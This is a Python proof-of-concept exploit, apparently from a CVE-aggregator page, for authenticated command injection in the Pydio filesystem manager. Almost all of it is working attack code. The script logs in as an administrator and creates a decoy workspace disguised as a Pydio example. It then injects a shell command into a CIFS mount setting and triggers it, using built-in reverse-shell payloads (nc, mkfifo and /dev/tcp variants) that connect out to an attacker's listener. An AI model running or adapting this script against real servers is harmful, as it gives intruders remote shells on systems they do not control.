4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
"""
This is an exploit for a vulnerability that I discovered in the Pydio Filesystem Manager.
The vulnerability allows for remote code execution through command injection in a 
particular setting field when attaching a specific plugin to a filesystem workspace. 
The prerequisite for exploiting this vulnerability is having credentials to a Pydio 
administrator account. 

Only use this on systems that you have explicit permission to test.
"""

import uuid
import urllib
import argparse
import requests

DEBUG = False
FAIL_ACCESS_STRING = "You are not allowed to access this resource"

def parse_token(response_text, token_type):
    if DEBUG:
        print(f"[*] parsing {token_type} from response")
    try:
        if token_type not in ["client_id", "secure_token"]:
            print("  [!] select correct token to parse ('client_id' or 'secure_token')")
            exit(1)
        if token_type == "client_id":
            secure_token = response_text.split("\"SECURE_TOKEN\":")[1][:34].replace("\"","")
        else:
            secure_token = response_text.split("\"")[-2]
        if len(secure_token) == 0:
            raise Exception
        return secure_token
    except Exception as e:
        print("  [!] could not parse token, check response text:")
        print(f"{e}")
        print(response_text)
        exit(1)

def process_request(session, request_type, message, headers=None, params=None, data=None, \
    success=None, loud=False, timeout=15, failure_string=None):
    if loud:
        print(f"[*] {message}")
    if request_type.lower() not in ["get", "post"]:
        print(f"  [!] incorrect request type ({request_type}")
        exit(1)
    # gross gross gross gross
    global URL
    # gross gross gross gross
    req = requests.Request(
        request_type,
        URL,
        headers=headers,
        params=params,
        data=data,
        )
    prepared_req = session.prepare_request(req)
    try:
        response = session.send(
            prepared_req,
            timeout=timeout
        )
    except requests.exceptions.ReadTimeout:
        return None
    except requests.exceptions.ConnectionError:
        print("  [!] couldn't connect to target ({})".format(URL))
        print("      do you have the right IP/URI/port?")
        exit(1)
    
    if DEBUG:
        print(response.status_code)
        print(response.text)

    if response.status_code == 204:
        # ignore this as we will handle it contextually
        print(f"  [!] error sending {message} request ({response.status_code})")
        print("      usually means we don't have permissions. this will be")
        print("      handled contextually.")
        return response
    elif response.status_code != 200:
        print(f"  [!] error sending {message} request ({response.status_code})")
        exit(1)
    else:
        if success:
            if success not in response.text:
                print(f"  [!] success condition not met for {message} request")
                print(f"    [*] required {success} in response")
                exit(1)
        if failure_string is None:
            failure_string = FAIL_ACCESS_STRING
        if failure_string in response.text:
            print(f"  [!] access failure on {URL}")
            print(f"    [*] type:\t\t{request_type}")
            print(f"    [*] url:\t\t{URL}")
            print(f"    [*] headers:\t{headers}")
            print(f"    [*] params:\t\t{params}")
            print(f"    [*] data:\t\t{data}")
            exit(1)
        if loud:
            print("  [+] success")
        return response


def get_secure_token(live_session):
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "keep-alive",
        "DNT": "1",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0"
    }
    r = process_request(live_session, "get", "grabbing client_id", headers=headers)
    client_id = parse_token(r.text, "client_id")
    return client_id

def login(live_session, client_id):
    """ 
    logs in and returns a session that is successfully auth'd, along with the secure token used
    for subsequent requests
    """
    global USERNAME, PASSWORD           # really, i make myself sick sometimes
    first_params = {
        "dir": "/",
        "get_action": "ls",
        "options": "al",
        "secure_token": client_id
    }
    process_request(live_session, "get", "staging login",params=first_params, loud=DEBUG)

    seed_params = {
        "get_action": "get_seed",
        "secure_token": client_id
    }
    r = process_request(live_session, "post", "seed setup", data=seed_params, loud=DEBUG)
    seed_val = r.text

    second_params = {
        "get_action": "login",
        "login_seed": seed_val,
        "userid": USERNAME,
        "password": PASSWORD,
        "secure_token": client_id
    }
    r = process_request(live_session, "post", "login POST",data=second_params, loud=DEBUG)
    login_token = parse_token(r.text, "secure_token")
    return login_token

def create_exploit_workspace(live_session, client_id, secure_token):
    exploit_workspace_name = "Pydio Example Workspace"
    exploit_workspace_description = "This is an example workspace provided by pydio. " + \
        "You may delete this workspace if you would like."
    exploit_path = str(uuid.uuid4()) # this is the folder it maps to on disk
    new_workspace_data = "{\"DRIVER\":\"fs\",\"DRIVER_OPTIONS\":{" + \
        f"\"USER_DESCRIPTION\":\"{exploit_workspace_description}\"," + \
        "\"CREATE\":true,\"CHMOD_VALUE\":\"0666\"," + \
        "\"RECYCLE_BIN\":\"recycle_bin\",\"PAGINATION_THRESHOLD\":500,\"PAGINATION_NUMBER\"" + \
        ":200,\"REMOTE_SORTING\":true,\"REMOTE_SORTING_DEFAULT_COLUMN\":\"ajxp_label\"," + \
        "\"REMOTE_SORTING_DEFAULT_DIRECTION\":\"asc\",\"UX_DISPLAY_DEFAULT_MODE\":\"list\"," + \
        "\"UX_SORTING_DEFAULT_COLUMN\":\"natural\",\"UX_SORTING_DEFAULT_DIRECTION\":\"asc\"," + \
        "\"PATH\":\"/tmp/somewherenew\"}," + \
        f"\"DISPLAY\":\"{exploit_workspace_name}" + \
        "\"}"
    get_id = process_request(
        live_session,
        "post",
        "creating new workspace to poison",
        data={
            "get_action": "create_repository",
            "json_data": new_workspace_data,
            "secure_token": secure_token
        },
        success="Successfully created workspace",
        loud=True
    )
    # splits <<< regex , but w.e.
    try:
        workspace_id = get_id.text.split("file=\"")[1].split("\"")[0]
    except:
        print("  [!] error parsing workspace ID ... ")
        print("      this didn't come up in testing")
        print("      you've gotta modify source to get this fixed :X")
        print("      RIP skids")
        exit(1)
    return {"name": exploit_workspace_name, "id": workspace_id}

def delete_exploit_workspace(live_session, client_id, secure_token, workspace):
    workspace_id = workspace["id"]
    process_request(
        live_session,
        "post",
        "deleting our created exploit workspace",
        data={
            "get_action": "delete",
            "data_type": "repository",
            "data_id": workspace_id,
            "secure_token":secure_token
        },
        success="Successfully deleted workspace",
        loud=True
    )

def pre_injection_staging(live_session, client_id, secure_token):
    process_request(
        live_session,
        "post",
        "staging injection",
        data={
            "get_action": "switch_repository",
            "repository_id": "ajxp_conf",
            "secure_token": secure_token
        },
        failure_string="Cannot access to workspace",
        loud=DEBUG
    )

def get_payload():
    # selects the payload from one of our pre-built ones, or a custom specified
    prebuilt_payloads = {
        "1": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LISTENER_IP} {LISTENER_PORT} >/tmp/f",
        "2": f"nc -e /bin/bash {LISTENER_IP} {LISTENER_PORT}",
        "3": f"/bin/bash -c '/bin/bash -i >& /dev/tcp/{LISTENER_IP}/{LISTENER_PORT} 0>&1'",
        "4": f"/bin/bash -c '/bin/bash &>/dev/tcp/{LISTENER_IP}/{LISTENER_PORT} <&1'"
    }
    if PAYLOAD:
        try:
            return prebuilt_payloads[PAYLOAD]
        except KeyError:
            return PAYLOAD
    else:
        return prebuilt_payloads["1"]

def inject_exploit(live_session, client_id, secure_token, workspace):
    # if we haven't set a custom payload, fire off a default nc rev shell
    global LISTENER_IP, LISTENER_PORT
    selected_payload = get_payload()
    encoded_injection = "{\"delete\":{},\"add\":{\"meta.mount\":{\"FILESYSTEM_TYPE\":\"cifs\"," + \
          "\"FILESYSTEM_TYPE\":\"cifs\",\"MOUNT_OPTIONS\":\"user=AJXP_USER,pass=AJXP_PASS" + \
          ",uid=AJXP_SERVER_UID,gid=AJXP_SERVER_GID\",\"MOUNT_RESULT_SUCCESS\":\"32\"," + \
          "\"USE_AUTH_STREAM\":\"true\"}},\"edit\":{\"meta.mount\":{" + \
          f"\"FILESYSTEM_TYPE\":\"cifs;{selected_payload};mount -t cifs\"," + \
          "\"MOUNT_OPTIONS\":\"user=AJXP_USER,pass=AJXP_PASS,uid=AJXP_SERVER_UID,gid=AJXP_SERVER_GID\"," + \
          "\"MOUNT_RESULT_SUCCESS\":\"32\",\"USE_AUTH_STREAM\":\"true\",\"UNC_PATH\":\"//127.0.0.1/test\"," + \
          "\"MOUNT_POINT\":\"/tmp/somewhere\",\"USER\":\"admin\",\"PASS\":\"password\"}}}"

    injection = [
        {
            "message": "editing repository",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action": "edit_repository",
                "repository_id": workspace["id"],
                "secure_token": secure_token
            },
            "success": "",
            "loud": DEBUG
        },
        {
            "message": "poisoning plugin",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action": "meta_source_edit",
                "repository_id": workspace["id"],
                "bulk_data": encoded_injection,
                "secure_token": secure_token
            },
            "success": "Successfully edited meta source",
            "loud": DEBUG
        },
        {
            "message": "poisoning workspace",
            "request_type": "post",
            "params": {
                "get_action": "edit",
                "sub_action":"edit_repository_data",
                "repository_id": workspace["id"],
                "secure_token": secure_token
            },
            "success": "Successfully edited workspace",
            "loud": DEBUG
        },
    ]
    for injection_step in injection:
        process_request(
            live_session,
            injection_step["request_type"],
            injection_step["message"],
            params=injection_step["params"],
            success=injection_step["success"],
            loud=injection_step["loud"]
        )

def check_injection(live_session, client_id, secure_token, workspace):
    check = process_request(
        live_session,
        "post",
        "confirming injection",
        params={
            "get_action": "edit", 
            "sub_action": "edit_repository", 
            "repository_id": workspace["id"], 
            "secure_token": secure_token
        },
        loud=DEBUG
        )
    print("[*] did we inject our poisoned plugin?")
    # probably a safe bet
    global LISTENER_IP
    injected = LISTENER_IP in check.text
    if injected:
        print("  [+] payload injected :)")
    else:
        print("  [!] nope..the plugin wasn't added :(")
    return injected

def trigger_exploit(live_session, secure_token, workspace):
    process_request(
        live_session, 
        "post",
        "triggering exploit", 
        params={
            "get_action": "switch_repository",
            "repository_id": workspace["id"],
            "secure_token": f"{secure_token}"
        }, 
        loud=DEBUG, 
        timeout=1
        )

def initialize_parser():
    parser = argparse.ArgumentParser(description='[*] exploit some pydio boxes (academically)')
    required_group = parser.add_argument_group(title='required arguments')
    required_group.add_argument(
        '-t',
        dest='target',
        required=True,
        help='this is the target URI for the pydio instance..i.e. http://127.0.0.1:31337/pydio/'
    )
    required_group.add_argument(
        '-u',
        dest='username',
        required=True,
        help='this is the username of the admin user'
    )
    required_group.add_argument(
        '-p',
        dest='password',
        required=True,
        help='this is the password of the admin user'
    )
    required_group.add_argument(
        '-L',
        dest='listener_ip',
        required=True,
        help='IP address to catch reverse shell on'
    )
    required_group.add_argument(
        '-P',
        dest='listener_port',
        required=True,
        help='port to catch reverse shell on'
    )
    parser.add_argument(
        '--payload',
        dest='payload',
        default=None,
        type=str,
        help='one of the pre-built reverse-shell payloads (1, 2, 3, 4, or 5), or a ' + \
            'custom command. keep in mind you can\'t use the (\") character as it ' + \
            'breaks the injection'
    )
    return parser

def process_target(target):
    # add / to the URI if it doesn't terminate with /..because otherwise things get weird
    if target[-1] != "/":
        target += "/"
    return target

def main():
    parser = initialize_parser()
    args = parser.parse_args()
    # set globals because i'm a filthy person
    global URL, USERNAME, PASSWORD, LISTENER_IP, LISTENER_PORT, PAYLOAD
    URL = process_target(args.target)
    USERNAME = args.username
    PASSWORD = args.password
    LISTENER_IP = args.listener_ip
    LISTENER_PORT = args.listener_port
    PAYLOAD = args.payload
    try:
        print("[*] exploit credentials")
        print(f"\tusername: '{USERNAME}'\n\tpassword: '{PASSWORD}'")
        live_session = requests.Session()
        client_id = get_secure_token(live_session)
        secure_token = login(live_session, client_id)
        pre_injection_staging(live_session, client_id, secure_token)
        exploit_workspace = create_exploit_workspace(live_session, client_id, secure_token)
        print("[*] trying to exploit workspace ({}) [{}]".format(exploit_workspace["name"], exploit_workspace["id"]))
        inject_exploit(live_session, client_id, secure_token, exploit_workspace)
        if check_injection(live_session, client_id, secure_token, exploit_workspace):
            print("[*] triggering exploit\n")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            print("[*][~][*][~][*][~][*]     !  brace for shell !     [*][~][*][~][*][~][*]")
            trigger_exploit(live_session, secure_token, exploit_workspace)
            print("\n... did you catch it ???\n")
        else:
            print("  [!] injection failed...boo :( (also shouldn't ever happen)")
        print("[*] cleaning up after ourselves")
        live_session = requests.Session()
        client_id = get_secure_token(live_session)
        secure_token = login(live_session, client_id)
        pre_injection_staging(live_session, client_id, secure_token)
        delete_exploit_workspace(live_session, client_id, secure_token, exploit_workspace)
        print("[+] done :)")

    except KeyboardInterrupt:
        print("\n  [!] keyboard interrupt detected...exiting")
        exit(1)

if __name__ == "__main__":
    main()